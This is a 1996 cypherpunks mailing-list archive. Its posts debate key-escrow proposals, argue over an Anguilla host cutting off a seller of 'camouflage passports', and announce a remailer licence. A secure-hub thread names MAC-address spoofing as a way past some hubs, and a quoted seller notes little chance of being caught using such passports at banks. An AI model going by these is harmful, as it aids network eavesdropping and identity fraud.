protects the individual from the penalties (or benefits) of losing the
key.  This procedure is technically simple; what is more complex is
ensuring that the TTP's are appropriately registered and protected
from undue government influence.  The use of such a TTP would in any
case be optional; the communicants need not use a TTP if they
understand their obligation to keep the crypto keys around for some
period of time afterwards.  

In Staelin's proposal government gains access to the communications,
but does not gain "real-time access" as desired by the FBI.  This loss
may be tolerable, given the benefit obtained (forcing access to be
made in accordance with the Constitutional requirements for
notification before search).  The use of wiretapping encrypted
communications as a preventive measure might be severely limited, but
its use as a means of gathering evidence to force a conviction would
be preserved.

For international communications, each communicant might be required to
use a TTP that is bound to honor the laws of his country (which TTP to be
used should be the choice of the communicant).  

It may be seem a bit strange to force individuals to keep around
information (keys) that they no longer really need.  However, this is
more-or-less the case for financial records right now.



CONCLUSION

The fundamental idea is to give the government a right to access
encrypted communication in return for a guarantee that access may not
be obtained until there is BOTH proper legal authorization AND proper
prior notice to (at least one of) the communicants.

Is this workable??

------- End of Forwarded Message

[Matt's comments follow]

The requirement to store your keys for some period of time would,
I think, be very unusal, legaly.

As far as I know there are virtually no records that an ordinary
individual is required to keep today under criminal penalty of law.
One has to keep tax records if one expects to be able to document
deductions if audited, but for people without deductions, no records
need be kept (and even those who do but who destroy their records
risk having their deductions disallowed, but face criminal penalties
only if the govenment can prove you intended fraud.  Not having
records does not by itself constitute fraud, as far as I know).

According to the original message:
	The attractive feature of this proposal is that it puts
	encrypted communications in the same category as private
	papers; the government is required to give notice to (at
	least one of) the affected individual(s) _before_ the search
	can be undertaken.  This cures what is in my mind a defect
	in the current wire-tapping laws.

Yes and no.  True, it makes it impossible to recover communication
without the knowledge of one party.  But it still goes well beyond
the  norms for private papers.  The vast majority of private papers
are, according to the law, just that - private.  One is under no
obligation to maintain "private papers" in any particular manner
or for any period of time.   Only very limited types of private
papers (none for most people) have to be maintained at all.  While,
in general, the government can get a court order to force one to
turn over documents that exist, one is not obligated to keep
documents that are otherwise of no use in order to be ready should
a court order happen sometime in the future.  One can burn one's
old love letters any time one feels like it.

But enough philosophy.  There are technical reasons to consider
this proposal a bad idea.

The main technical problem with the Staelin proposal is the
requirement that the user maintain a large store of no longer useful
but highly sensitive data in a secure manner for a period of time.
This introduces an obvious storage burden (how does an encrypting
phone or network connection store old keys?) that would make many
kinds of otherwise simple encryption hardware and software far more
complex and difficult to design and expensive to implement and
operate.  Consider a secure phone (like the TSD 3600 or STU III).
A critical design feature of these devices is that they never have
to emit secret keys outside their internal security boundaries.
Consider, too, software that runs on PCs and workstations.
Ordinarily, software that establishes, say, a secure Internet
connection has no need to store any secret associated with the
session anywhere.  And that's a good thing - the file systems on
most computers aren't secure enough to store keys, so including
the key storage feature required by the Staelin scheme would entail
implementing some kind of secure storage system that isn't otherwise
needed by the application.  Even if the design complexity is solved,
there is the problem of maintaining the stored keys in a secure
manner, introducing what would in most cases be a more serious
security vulnerability than any other aspect of the application
(since the keys would continue to exist long after the secure
session has ended).   Under the Staelin proposal, the design,
implementation, and use of encryption software and hardware becomes
much more complex, so complex that I honestly don't think we know
how to do it.  I touch on these points in discussing key escrow in
general in my Senate testimony,
ftp://research.att.com/dist/mab/testimony.txt .

While Ron's twist decreases some of the burden on the user it
eliminates the main benefit of the Staelin proposal - that one
cannot obtain cleartext without the knowledge of at least one party.
The TTP could be compelled (as the phone company is now for regular
wiretaps) to keep the request secret, under court order.  And the
design complexity problem doesn't even go away - in fact, it gets
worse, since now there's a protocol with a third party involved.

-matt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 14 Aug 1996 14:59:08 +0800
To: Vincent Cate <cypherpunks@toad.com
Subject: Re: More on "Fraud" and Anguilla
Message-ID: <199608140439.VAA28830@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 8/13/96 -0400, Vincent Cate wrote:
> Again, what I said was my lawyer called and said it was illegal to sell
> fake passports in Anguilla.  The fraud was taxbomber saying he never sold
> fake passports in his post to the net of "feel sorry for me my ISP made me
> relocate even though I never sold fake passports". 

He never sold fake passports.  If his passports had been marked 
"United States of America" or some such they would indeed be
fake.  They were not fake.  Who says that only generally recognized
governments of major nations are entitled to issue passports?

> > a) what he was offering actually violated Anguillan law (was there a
> > determination that selling camouflage passports violates a specific
> > statute?)

> My lawyer, probably the top lawyer in the country, said it is illegal in
> Anguilla. I don't have a copy of that law. 

You should.

The fact that you do not indicates alarming willingness to bend over,
which is inconsistent with the way you represent your service in 
your ad.  Amend the ad, or employ more spine.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 14 Aug 1996 14:37:20 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: India, Productivity, and Tropical Climes
Message-ID: <199608140439.VAA28846@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 8/13/96 +0600, Arun Mehta wrote:
> As regards IBM, its agreement with the government of India, under
> which it was allowed to operate in the country, stipulated that
> it would produce here, and transfer some technology. Instead, as
> the government found, all it did was sell time on second-hand
> computers (1401's as I recall, and this was mid  to late '70s).
> IBM was asked to either dilute, or live up to its original
> agreement, which it wasn't prepared to do, so it left.

Every single foreign computer company left during roughly the same 
period, as did almost all foreign companies and anybody who had a choice.

The reasons generally given by those who left, for this mass exodus, 
which eventually sent the government into insolvency, is that Indian 
]officials were arrogant, rude, dishonest, corrupt, continually broke 
contracts and agreements, and attempted to exercise direct power over 
everyone and everything.

If indian government officials have a different version, I would not
regard that version as coming "from the horses mouth"
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Aug 1996 15:09:53 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla...etc.
Message-ID: <ae36aa4d09021004cad4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:25 AM 8/14/96 Moscow Time, Dr.Dimitri Vulis KOTD wrote:
>"Greg Kucharo" <sophi@best.com> writes:
>>   While Tim may be right that nobility is lost when backing down to the
>> authorities, the fact is that this game has little to do with noble
>> purposes. ...
>
>Nor was there any activity from the authorities.
>
>A while back, when Vince first started advertizing his site, I asked him a few
>hypothetical questions, and he said roughly this: If client X posts something
>to Usenet from Vince's site, and if Y dislikes X's article so much that he
>mailbombs X, then Vince would pull X's plug. (I have the exact quote saved.)
>I lost interest right then. I'm not surprised that Vince acted dishonorably by
>pulling a client's plug with no warning for a very flimsy reason.

"Acted dishonorably"?

Really, Dimitri, are all Russians this rude? (Seeing the battles on Usenet
between the "Sovoks" and the "Gruborbots," I'm beginning to think so.)

While I think the Anguilla situation is an interesting one to analyze, I
avoid such loaded terms as "dishonorable."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 14 Aug 1996 12:35:21 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <01I88ETCWWHC9JD663@mbcl.rutgers.edu>
Message-ID: <199608140153.VAA01982@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> 	A: How possible is it to insulate cars from these effects? 

D
I
E
S
E
L

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Aug 1996 16:38:35 +0800
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: key escrow idea from David Satelin of MIT Lincoln Labs
Message-ID: <199608140509.WAA06467@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:19 PM 8/13/96 -0400, Matt Blaze wrote:
>My comments included below Rivest's message.
>------- Forwarded Message from Rivest
>Here is another MIT professor's (Dave Staelin's) suggestion for a
>national crypto policy.  I thought you might be interested in seeing
>it; given the difficulty of the debate, any variant, even if only
>slightly different from previous ones, should be considered.  Feel
>free to pass this note around, or to post it...
>
>Here is Staelin's idea:
>	(1) You can use any crypto you want, but you must keep a record
>	    of the crypto keys you used.
>	(2) The government can ask for the crypto keys later, if they have
>	    a court order, just as they can ask for any of your other papers
>	    or documents.  You must give the key(s) to them, just as you
>            must turn over your private papers in such a situation.
>            (There would have to be an appropriate penalty for losing the
>            key...)
>
>The attractive feature of this proposal is that it puts encrypted
>communications in the same category as private papers; the government
>is required to give notice to (at least one of) the affected
>individual(s) _before_ the search can be undertaken.  This cures what is
>in my mind a defect in the current wire-tapping laws.  

While I agree that there is a defect in current wire-tapping laws,  it's a 
lot more serious than this.   The defect, I think, is that wiretapping is 
thoroughly unconstitutional.  The reason I believe it's unconstitutional is 
that unlike any other kind of search warrant that preceeded it, a wiretap 
warrant authorizes a continuing violation of privacy. It also allows police 
to violate that privacy secretly.  Indeed, as I understand it current 
practice is to not inform the target of the tap even once the tap is 
removed.  It appears far more likely that the technical fact that wiretaps 
can be done without informing the target has allowed the cops to 
conveniently re-interpret the Constitution to assume that no notification is 
necessary.

 Regular search warrants simply allow police to visit a location, ONCE, and 
collect evidence.  The police must show up, identify themselves, and do 
their search, and LEAVE.  Once they're gone, privacy is restored.  And the 
target is informed of the police's interest, and so the police are motivated 
to not engage in "shotgun wiretaps" against people who aren't likely worthy 
of them.  I contend that there is no logical reason to believe that the 
current practice of wiretapping is anticipated by any other search warrant.  

The _reason_ wiretaps are done in a manner so hostile to privacy and the 
Constitution, I believe, is that when they were "legalized" in 1968, police 
had already had a long history of doing them illegally, but because they 
were illegal they couldn't be entered into evidence in court.  That 
legalization was ostensibly a compromise to  make them admissable, but also 
make the police obey the law.  The problem is that since the police were 
ALREADY violating the law, any "compromise" they were likely to agree to 
would have been strongly weighted against a Constitutional interpretation. 
(If you already have 3/4s of the loaf, why give it up?)  

In fact, the police gave up NOTHING:  If they were able to get illegal 
wiretaps before 1968, there is no reason to believe that they couldn't get 
them after 1968.

 If, on the other hand, the police had genuinely obeyed the law and 
Constitution before 1968, more effective protections against violations of 
privacy would have been obtainable in exchange for legalizing wiretaps.  For 
example, they might have been forced to agree to informing the target of 
every wiretap when it is removed, or maybe even informing them when the tap 
is placed!  This will appear quite odd to the police, who will claim that 
wiretaps won't do any good against informed targets, but then again they 
probably objected to being prohibited from using thumbscrews and beating 
confessions out of prisoners.  The fact is, not every police practice which 
is arguably useful is bound to be Constitutional.

Another problem is with item 2 above:  It amounts to an obvious violation of 
the 5th amendment to the Constitution, because it criminalizes the refusal 
to provide evidence  against yourself.  Even worse, it requires that you 
maintain, effectively, all conversations done by electronic/encrypted means. 
   It is somewhat as if you were required to carry a tape recorder around 
and keep a record of every conversation you ever have, to be released to the 
cops whenever they get a search warrant.

Rivest may be an excellent cryptographer, but a constitutional scholar he 
ain't.

>DISCUSSION
>In a variant of Staelin's proposal (my twist) you could append to each
>encrypted message an encrypted form of the message key.  The
>encryption could be with the public-key of a trusted third party who
>will not (and legally may not) reveal the message key without
>notifying you first (or ensuring that you have been appropriately
>served with the corresponding warrant).  For example, the ACLU might
>be such a TTP.  This protects the government's right to access and
>protects the individual from the penalties (or benefits) of losing the
>key.  This procedure is technically simple; what is more complex is
>ensuring that the TTP's are appropriately registered and protected
>from undue government influence.  The use of such a TTP would in any
>case be optional; the communicants need not use a TTP if they
>understand their obligation to keep the crypto keys around for some
>period of time afterwards.

What about an alternate system that takes  a poll, and requires a vote of 
90% or more to allow the government to get the escrowed key?  If the target 
is REALLY a "big bad criminal" then likely they'll get approval.  OTOH, if 
the government had just "done a Waco" and a substantial fraction of the 
population were seriously pissed, the government wouldn't have a prayer.
  
(not that I'd find even this system "acceptable," but at least it would be 
better...  The problem is, none of these proposals reflect any recognition 
that there may come a time where it would be far better for society to NOT 
give the government the evidence it wants.  This "government is always 
right" patina is wearing mighty thin.)

>In Staelin's proposal government gains access to the communications,
>but does not gain "real-time access" as desired by the FBI.  This loss
>may be tolerable, given the benefit obtained (forcing access to be
>made in accordance with the Constitutional requirements for
>notification before search).

It sounds like you're saying that the government must inform the target of 
the wiretap BEFORE doing it.  ("notification before search")  Right?  That 
would at least be better than the status quo.


>  The use of wiretapping encrypted
>communications as a preventive measure might be severely limited, but
>its use as a means of gathering evidence to force a conviction would
>be preserved.
>
>For international communications, each communicant might be required to
>use a TTP that is bound to honor the laws of his country (which TTP to be
>used should be the choice of the communicant).  
>
>It may be seem a bit strange to force individuals to keep around
>information (keys) that they no longer really need.  However, this is
>more-or-less the case for financial records right now.

However, people aren't obligated to keep financial records around, or keep 
them in a form the cops can read.


>CONCLUSION
>
>The fundamental idea is to give the government a right to access
>encrypted communication in return for a guarantee that access may not
>be obtained until there is BOTH proper legal authorization AND proper
>prior notice to (at least one of) the communicants.

Two giant steps backward!  I genuinely don't see that I, as an ordinary 
citizen, am EVER likely to be a victim of a crime which could be prevented 
or solved by the system as Rivest describes it.  OTOH, I believe that it is 
almost certain that my rights will continue to be abused by a government 
which will be able to use this system to protect itself from being removed, 
either by vote or by gunfire.  I conclude that proposals like this will 
rarely be used to protect ordinary citizens, and are almost entirely 
intended to buttress the government.


>Is this workable??

NO!

>------- End of Forwarded Message
>
>[Matt's comments follow]
[much deleted]
>While Ron's twist decreases some of the burden on the user it
>eliminates the main benefit of the Staelin proposal - that one
>cannot obtain cleartext without the knowledge of at least one party.
>The TTP could be compelled (as the phone company is now for regular
>wiretaps) to keep the request secret, under court order. 

Which, of course, is yet another problem with the current wiretap system.  
Given the 1st amendment, I see NOTHING which should allow the government to 
prohibit a third party (the phoneco) from telling me of the police's 
interest.  I realize that this is "assumed without question" by the various 
suck-ups who populate government and probably most lawyers, but it seems to 
me that one of the disadvantages of the government going outself itself to 
obtain evidence SHOULD BE that in doing so, it reveals its interests to 
those third parties.

As far as I'm aware, if the police serve an ordinary search warrant at a 
particular address, they  can't prohibit the targets of that warrant from 
telling anyone else of this.  It seems to me that the main reason police 
have gotten used to the idea of doing search warrants secretly is that the 
local phonecos have been monopolies so long, and they're so used to 
cooperating with government and the cops (as evidenced by the fact that 
police regularly got illegal wiretaps before 1968), that this has soaked in 
as being expected.  Indeed, the pre-'68 illegal wiretaps prove beyond a 
shadow of a doubt that government and the telephone company never have had 
any sort of arm's-length relationship, and strongly suggest that the 
Constitutionality of wiretapping (vis a vis the constitutionality of 
phoneco's claimed responsibility to keep the whole thing secret) has never 
been legitimately tested.

Remember, since the phoneco has had no competition, they've never been at 
risk from being shunned by customers who object to this secret cooperation.  
A more "realistic" position, I think, would be to conclude that if there was 
true competition, customers would be able to negotiate varying levels of 
non-cooperation in order to win customers.  I suspect that post-Ruby 
Ridge/post-Waco, there would be a substantial fraction of the public who 
would conclude that it cannot trust its own government.

I can think of at least one suck-up lawyer who will pooh-pooh this, claiming 
that wiretaps are now legal, but when looked at from a pre-1968 standpoint, 
wiretaps were illegal, so it seems logical that customers should have been 
entitled to insist that telephone companies obey the law.  It's hard to 
avoid the conclusion that the reason this kind of illegal behavior was done 
by the cops as well as the phonecos is the fact that no phoneco ever had to 
fear loss of any kind of profit as a consequence of illegal cooperation.  

Indeed, I doubt that any telephone company EVER _publicly_ refused an 
illegal wiretap request by police. (By this, I mean the phoneco informed the 
public of an illegal request on its own initiative.)  The total or 
near-total absence of such practices would make it clear that nothing that 
occurred before 1968 could possibly be considered  the norm for 
constitutionality, casting further doubt on the 1968 "compromise."

It doesn't seem likely (from a constitutional standpoint, anyway) that the 
"normal" level of cooperation that police can get from a monopolized, 
regulated industry should, retroactively, become considered to be the 
"constitutional" amount of cooperation that the cops can legally expect to 
get from everyone else.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Wed, 14 Aug 1996 13:57:17 +0800
To: remailer-operators@c2.org
Subject: WinSock Remailer Now Available By E-Mail
Message-ID: <199608140213.WAA93882@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The first alpha release of the WinSock Remailer is now available via
e-mail.  Due to problems setting up user authentication on my homepage
at

  http://www.c2.net/~winsock/

I have decided to distribute it via e-mail until I can get user 
authentication working.

In order for you to receive the WinSock Remailer, I have to be reasonably 
sure that you are a US or Canadian citizen or permanent resident.  
Therefore, you will need to review a copy of the License Agreement and 
fill out the required information.  Then clear-sign the agreement with PGP 
and mail it to me at jgrasty@gate.net.  Don't forget to tell me where I can
find your PGP public key so that I can check the signature.  No signed
license agreement, no remailer.

In order for me to have a good feeling that you are not a foreign national,
I need to have the following information check out:

a.  Verify that your address is within the boundaries of the US or Canada.
    I will do this by checking if you are in a public address database such
    as "88 Million Households Phone Book".
b.  Verify that your name and e-mail address is the same as in your public 
    key.

This is basically the same method that Netscape is using at:

  http://wwwus.netscape.com/eng/US-Current/

to verify citizenship or permanent residency, but the process is not
automated.

I don't like having to enforce clearly unconstitutional ITAR regulations,
but I'm not ready for an extended stay at Club Fed.

- ---------------------------cut here-----------------------------------
WinSock Remailer License Agreement

This is the license agreement between Joey Grasty and the end user
of the WinSock Remailer.

Name of User: <your name>
Street Address:  <your street address>
Town, State, Country: <town>, <state or province>, <country>
Phone Number: <your phone number>
E-mail Address: <your e-mail address>
Where to find your PGP Public Key: <instructions>


1. Joey Grasty grants to you a non-exclusive, non-sublicensable, 
license to use this Alpha version of the WinSock Remailer (the 
"Software"), in binary executable form for evaluation and trial use 
purposes only.  

2. JOEY GRASTY MAKES NO REPRESENTATIONS ABOUT THE SUITABILITY OF THIS
SOFTWARE OR ABOUT ANY CONTENT OR INFORMATION MADE ACCESSIBLE BY THE
SOFTWARE, FOR ANY PURPOSE.  THE SOFTWARE IS PROVIDED 'AS IS' WITHOUT
EXPRESS OR IMPLIED WARRANTIES, INCLUDING WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE OR NONINFRINGEMENT.  THIS SOFTWARE
IS PROVIDED GRATUITOUSLY AND, ACCORDINGLY, JOEY GRASTY SHALL NOT BE LIABLE
UNDER ANY THEORY OR ANY DAMAGES SUFFERED BY YOU OR ANY USER OF THE
SOFTWARE.  JOEY GRASTY DOES NOT HAVE ANY OBLIGATION TO SUPPORT THIS 
SOFTWARE OR ISSUE ANY UPDATES IN THE FUTURE.

3. While Joey Grasty intends to distribute a commercial release of the
Software, Joey Grasty reserves the right at any time not to release a
commercial release of the Software or, if released, to alter prices,
features, specifications, capabilities, functions, licensing terms,
release dates, general availability or any other characteristics of the
commercial release as he sees fit.

4. Title, ownership rights, and intellectual property rights in and to
the Software shall remain in Joey Grasty and/or its suppliers.  You agree
to abide by the copyright law and all other applicable laws of the
United States including, but not limited to, export control laws.

5. Joey Grasty may terminate this License at any time by delivering notice
to you and you may terminate this License at any time by destroying or
erasing your copy of the Software and notifying Joey Grasty of this action
forthwith.  This License is personal to you and you agree not to assign your 
rights herein.  This License shall be governed by and construed in accordance 
with the laws of the State of Florida and, as to matters affecting copyrights, 
trademarks and patents, by U.S.  federal law.  This License sets forth the entire
agreement between you and Joey Grasty.

6. Use, duplication or disclosure by the Government of any locality, state 
or country, its elected officials or employees, is forbidden.

7. You may not download or otherwise export or reexport the Software or
any underlying information or technology except in full compliance with
all United States and other applicable laws and regulations.  In
particular, but without limitation, none of the Software or underlying
information or technology may be downloaded or otherwise exported or
reexported (i) into (or to a national or resident of) Cuba, Haiti,
Iraq, Libya, Yugoslavia, North Korea, Iran, or Syria or (ii) to anyone
on the US Treasury Department's list of Specially Designated Nationals
or the US Commerce Department's Table of Deny Orders.  By downloading
the Software, you are agreeing to the foregoing and you are
representing and warranting that you are not located in, under control
of, or a national or resident of any such country or on any such list.

8. JOEY GRASTY OR ITS SUPPLIERS SHALL NOT BE LIABLE FOR (a) INCIDENTAL,
CONSEQUENTIAL, SPECIAL OR INDIRECT DAMAGES OF ANY SORT, WHETHER ARISING IN
TORT, CONTRACT OR OTHERWISE, EVEN IF JOEY GRASTY HAS BEEN INFORMED OF THE
POSSIBILITY OF SUCH DAMAGES, OR (b) FOR ANY CLAIM BY ANY OTHER PARTY. THIS
LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL
INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE,
SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR
CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO
YOU.

9.  HIGH RISK ACTIVITIES.  The Software is not fault-tolerant and is not
designed, manufactured or intended for use or resale as on-line control
equipment in hazardous environments requiring fail-safe performance, such
as in the operation of nuclear facilities, aircraft navigation or
communication systems, air traffic control, direct life support machines,
or weapons systems, in which the failure of the Software could lead
directly to death, personal injury, or severe physical or environmental
damage ("High Risk Activities").  Joey Grasty and its suppliers specifically
disclaim any express or implied warranty of fitness for High Risk
Activities.

Clear-sign this agreement with your PGP public key and e-mail it to 
jgrasty@gate.net.

- -------------------------------cut here------------------------------------

Thank you for your patience with this crude form of distribution.

Regards,


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMhE2UsODO2V89BZZAQGOLAL9GU15R4N/6xIZCJGYaQ0Vlw4e7rqP06+d
YH5806om50v/+8P9OKrxBOECEHPJLirFQcITXsYMn/DkVAcTVTrz9rKfJdzToeyB
Bwr4vgpMqKw4oZnFGJa1PvUotSjTnETT
=Arts
-----END PGP SIGNATURE-----

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 13:05:36 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla story...
In-Reply-To: <Pine.LNX.3.91.960813211651.11064A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960813220355.11082B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Tim
>Vince:
> >In a nut shell, taxbomber.com was on my system in Anguilla.  He was
> >selling "camoflauge passports".  One David Evans of Bloomberg Business
> >News wrote an article where he quoted taxbombers page saying something
> >like "it is illegal to use these passports to open up bank accounts, but
> >there is little chance of getting caught". I got a call from my lawyer who
> >had seen the article (along with just about everyone else in Anguilla) and
> >he told me that was illegal in Anguilla and I should cancle the account.
> >I did and taxbomber moved to another provider in another country.
> >
> >1) A number of cypherpunks are dissapointed that I did not fight to my
> >death to defend this guy.
> 
> I think you're overstating the case made by some of us, or, at least, by me.

Your not dissapointed?

> What I said was that your policies need to be spelled out, and that I saw
> little evidence of "fraud" in what the guy was doing.

Ok.  I now have a link from my main page to a page with my policy.

What I said (or meant to) was that MY LAWYER SAID IT WAS ILLEGAL IN 
ANGUILLA.  

In my first post I quoted the wrong part and said "this is fraud by
taxbomber - he did sell fake passports".  I meant to quote a part
where he said something like "I never sold fake passports".

It may be covered in the anti-fraud sections of the laws.

> And that if you cut
> off accounts (without warning, it sounds like)

He got a little warning, then only web access was cut off.  And I forwarded
his email and was the nameserver for his domain name so that he could move
right away to another site.  Then he sent a message to the Internic to
move the management of his domain to another site.  

> based on fairly flimsy (it
> seems to me, and to Duncan, and to others) advice, then certain
> reputational consequences are likely to follow.

Understood.

> By the way, from what you quote this guy as saying ("it is illegal to use
> these passports to open up bank accounts, but there is little chance of
> getting caught"), I _still_ see no fraud.

Not saying that is fraud.  The most I said was encouraging fraud.  It
has been pointed out that under common law using another name is not 
fraud.  However, under certain countries laws using a fake passport
to open a bank account may be defined as fraud.

> >2) If the guy did not mention where his site was, the reporter probably
> >would never have mentioned Anguilla and me in the article.
> 
> Is this the real issue, that what he was doing brought bad publicity to you
> and to Anguilla?

It is both a lesson to be learned, and part of the overall situation.

> These issues need to be aired. Of course you have every right to run things
> as you wish, modulo contractual arrangements you may have entered into with
> your customers and your Internet providers. But we on this list have
> certain ideas about what an "offshore information provider" should provide.

Sure.  And you can run your offshore services as you wish.  I like mine
better.  :-)

> Contrast this case with the well-publicized cases recently where Neo-Nazi
> material is being hosted on U.S. web sites.

If selling fake passports is illegal in Anguilla, and the US has freedom
of speech, they are not comparable. 

  --  Vince
 
-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 13:05:28 +0800
To: cypherpunks@toad.com
Subject: Re: More on "Fraud" and Anguilla
In-Reply-To: <Pine.LNX.3.91.960813211740.11064B-100000@offshore>
Message-ID: <Pine.LNX.3.91.960813221825.11082C-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



> I've been thinking about this whole "Taxbomber" issue of "fraud."

Again, what I said was my lawyer called and said it was illegal to sell
fake passports in Anguilla.  The fraud was taxbomber saying he never sold
fake passports in his post to the net of "feel sorry for me my ISP made me
relocate even though I never sold fake passports". 

> (I'm
> still not completely sure whether Taxbomber lost his account at Offshore
> Information Services Ltd. because:
> 
> a) what he was offering actually violated Anguillan law (was there a
> determination that selling camouflage passports violates a specific
> statute?)

My lawyer, probably the top lawyer in the country, said it is illegal in
Anguilla. I don't have a copy of that law. 

> b) what he was offering constituted fraud (to whom? His customers certainly
> knew what they were buying. To potential victims in the future?)

Not clear if it is defined as fraud by the law. 
 
> c) he brought unwelcome attention to Anguilla in general and to Offshore
> Information Services Ltd. in particular. (Vince's mention that the whole
> island had read the story suggests something to this.)

This is part of it.  If nobody knew where he was things might have
continued as they were.  I mention it as a lesson learned.
 
> d) he violated some particular clause of his service agreement with
> Offshore Information Services Ltd.

We did not have any contract.  I have since posted a page with the policy. 
Fair point.

> Now I read from this that Vince is encouraging "multi-level-marketing
> companies" to use his service. Am I wrong on this?
> 
> Another name for this, commonly used, is "pyramid scheme." Or "Ponzi
> scheme." 

Well, multi-level marketing does not need to be pyramid scheme, but 
you are right that it could be bad news.  So I have taken off that
encouragement from my web page.  Thanks.

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 14 Aug 1996 15:52:19 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Geek Apartments and Etherpunks
In-Reply-To: <Pine.BSF.3.91.960814043926.771A-100000@mcfeely.bsfs.org>
Message-ID: <Pine.GUL.3.95.960813221411.8341A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Any lingering cypherpunk-relevant curiosity should probably be directed to
http://cougar.haverford.edu/resnet96/repeaters.html ]

On Wed, 14 Aug 1996, Rabid Wombat wrote:
> On Tue, 13 Aug 1996, Rich Graves wrote:
> > On Tue, 13 Aug 1996, Ben Combee wrote:
> > 
> > The "secure hubs" at GATech don't do encryption -- no way could that be done
> > at wire speed. What they do is fill the data portion of the Ethernet packet
> > with nulls. Everyone gets to see the source and destination MAC address and
> > length of every packet, but only the recipient (or a very clever spoofer --
> > most of the "secure hubs" on the market have a few vulnerabilities) gets
> > the data.
> 
> What vulnerabilities? I've heard tell of some(?) that "leak" unscrambled 
> packets if flooded with extreme traffic levels, but have never seen or 
> verified this. Got any specifics?

Change your MAC address to be the same as the hub's. 3Com recently fixed
this. Others might not have. 

> > As far as real-world geek apartments go, I heard of one in Manhattan that
> > worked exactly as described. I don't know whether they run "secure hubs."
> > Presumably they would -- I can't think of a major manufacturer's manageable
> > 10BaseT hub that lacks MAC address lockout features.
> 
> Most manufacturers offer SNMP-manageable hubs, but these don't offer 
> MAC-layer security. That usually costs a lot extra. The MAC-layer feature 
> is not widely used.

That was true six months ago, but 3Com, Allied, Cabletron, Synoptics, HP,
UB, and others now include it as a matter of course. Asante is the notable
exception. There are some kooks out there, like the people at RIT, who think
that everyone needs switched ports; and a few cheapskates, like management
at a major university in the Palo Alto area, who stick with Asante because
it's cheapest, and trust students to be nice (or at least nice enough to get
caught). 

> btw - if I were in an apartment environment, I'd want the "secure hubs",
> and would verify that they're actually in the secure mode. They usually
> have a "learning" mode, where they simply register the MAC address most
> recently assigned to each port (sort of like learning bridges - this saves
> a lot of manual entry). Of course, if left in this mode, they don't do a
> thing for security.
